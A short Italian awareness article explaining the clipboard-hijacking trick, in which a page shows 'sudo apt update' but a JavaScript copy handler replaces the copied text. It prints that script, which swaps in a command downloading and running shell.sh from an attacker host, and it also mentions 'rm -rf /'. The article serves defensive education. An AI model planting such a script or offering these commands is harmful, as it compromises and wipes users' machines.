Programmatori, amministratori di sistema ed esperti nel settore informatico copiano e incollano centinaia e centinaia di righe di codice nei loro programmi o, ancora peggio, nella loro shell.


Recentemente, Gabriel Friedlander, Founder di una piattaforma di cybersecurity awareness, ha dimostrato che un ovvio (ma sorprendente) trucco ti farà pensare due volte prima di copiare e incollare codice da internet.

Copia questo comando:

sudo apt update




Tutto ciò è spaventoso e molto pericoloso, dato che anche i più esperti del settore cadrebbero in questo tranello.

Ma come funziona?

Il codice


<script>
document.getElementById(copy).addEventListener(copy, function(e) { 
    e.clipboardData.setData(text/plain, curl http://attacker-domain:8000/shell.sh | sh\n’); e.preventDefault(); });
 </script>

Questo trucco è ancora molto poco conosciuto, quindi ti invito a condividerlo il più possibile per evitare che i tuoi amici o colleghi eseguano rm -rf / nei loro dispositivi 🙂